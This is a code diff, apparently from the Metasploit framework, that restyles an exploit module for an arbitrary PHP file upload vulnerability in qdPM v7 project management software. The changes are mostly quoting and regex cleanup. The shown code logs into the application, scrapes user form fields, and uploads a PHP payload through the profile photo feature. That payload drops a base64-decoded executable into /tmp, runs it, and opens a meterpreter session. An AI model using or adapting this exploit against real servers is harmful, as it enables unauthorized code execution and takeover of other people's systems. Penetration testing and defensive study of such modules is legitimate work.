@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => "qdPM v7 Arbitrary PHP File Upload Vulnerability",
+        'Name' => 'qdPM v7 Arbitrary PHP File Upload Vulnerability',
         'Description' => %q{
           This module exploits a vulnerability found in qdPM - a web-based project management
           software. The user profile's photo upload feature can be abused to upload any
@@ -37,7 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultOptions' => {
           'EXITFUNC' => 'thread'
         },
-        'Platform' => %w{linux php},
         'Targets' => [
           [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
           [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
@@ -69,18 +68,19 @@ class MetasploitModule < Msf::Exploit::Remote
     uri << '/' if uri[-1, 1] != '/'
     base = File.dirname("#{uri}.")
 
-    res = send_request_raw({ 'uri' => normalize_uri(base, "/index.php") })
-    if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m
-      major, minor = $1, $2
+    res = send_request_raw({ 'uri' => normalize_uri(base, '/index.php') })
+    if res and res.body =~ %r{<div id="footer">.+qdPM (\d)\.(\d).+</div>}m
+      major = ::Regexp.last_match(1)
+      minor = ::Regexp.last_match(2)
       return Exploit::CheckCode::Appears if (major + minor).to_i <= 70
     end
 
     return Exploit::CheckCode::Safe
   end
 
-  def get_write_exec_payload(fname, data)
+  def get_write_exec_payload(fname, _data)
     p = Rex::Text.encode_base64(generate_payload_exe)
-    php = %Q|
+    php = %|
     <?php
     $f = fopen("#{fname}", "wb");
     fwrite($f, base64_decode("#{p}"));
@@ -94,8 +94,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_new_session(cli)
-    if cli.type == "meterpreter"
-      cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
+    if (cli.type == 'meterpreter') && (!cli.ext.aliases.include?('stdapi'))
+      cli.core.use('stdapi')
     end
 
     @clean_files.each do |f|
@@ -130,19 +130,19 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
-    cookie = (res and res.get_cookies =~ /qdpm\=.+\;/) ? res.get_cookies : ''
+    cookie = (res and res.get_cookies =~ /qdpm=.+;/) ? res.get_cookies : ''
     return {} if cookie.empty?
 
-    cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]
+    cookie = cookie.to_s.scan(/(qdpm=\w+);/).flatten[0]
 
     # Get user data
-    vprint_status("Enumerating user data")
+    vprint_status('Enumerating user data')
     res = send_request_raw({
       'uri' => "#{base}/index.php/home/myAccount",
       'cookie' => cookie
     })
 
-    return {} if not res
+    return {} if !res
 
     if res.code == 404
       print_error("#{username} does not actually have a 'myAccount' page")
@@ -151,9 +151,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     b = res.body
 
-    user_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[id\]\" value\=\"(.+)\" id\=\"users\_id\" \/\>/).flatten[0] || ''
-    group_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[users\_group\_id\]\" value\=\"(.+)\" id\=\"users\_users\_group\_id\" \/>/).flatten[0] || ''
-    user_active = b.scan(/\<input type\=\"hidden\" name\=\"users\[active\]\" value\=\"(.+)\" id\=\"users\_active\" \/\>/).flatten[0] || ''
+    user_id = b.scan(%r{<input type="hidden" name="users\[id\]" value="(.+)" id="users_id" />}).flatten[0] || ''
+    group_id = b.scan(%r{<input type="hidden" name="users\[users_group_id\]" value="(.+)" id="users_users_group_id" />}).flatten[0] || ''
+    user_active = b.scan(%r{<input type="hidden" name="users\[active\]" value="(.+)" id="users_active" />}).flatten[0] || ''
 
     opts = {
       'cookie' => cookie,
@@ -203,7 +203,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
-    return (res and res.headers['Location'] =~ /home\/myAccount$/) ? true : false
+    return (res and res.headers['Location'] =~ %r{home/myAccount$}) ? true : false
   end
 
   def exec_php(base, opts)
@@ -215,14 +215,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'cookie' => cookie
     })
 
-    if not res
-      print_error("Unable to request the file")
+    if !res
+      print_error('Unable to request the file')
       return
     end
 
-    fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''
+    fname = res.body.scan(%r{<input type="hidden" name="preview_photo" id="preview_photo" value="(\d+-\w+\.php)" />}).flatten[0] || ''
     if fname.empty?
-      print_error("Unable to extract the real filename")
+      print_error('Unable to extract the real filename')
       return
     end
 
@@ -242,7 +242,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Attempt to login with '#{user}:#{pass}'")
     opts = login(base, user, pass)
     if opts.empty?
-      print_error("Login unsuccessful")
+      print_error('Login unsuccessful')
       return
     end
 
@@ -259,16 +259,16 @@ class MetasploitModule < Msf::Exploit::Remote
       p = get_write_exec_payload("/tmp/#{bin_name}", bin)
     end
 
-    print_status("Uploading PHP payload (#{p.length.to_s} bytes)...")
+    print_status("Uploading PHP payload (#{p.length} bytes)...")
     opts = opts.merge({
-      'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',
+      'username' => user.scan(/^(.+)@.+/).flatten[0] || '',
       'email' => user,
       'filename' => php_fname,
       'data' => p
     })
     uploader = upload_php(base, opts)
-    if not uploader
-      print_error("Unable to upload")
+    if !uploader
+      print_error('Unable to upload')
       return
     end
 
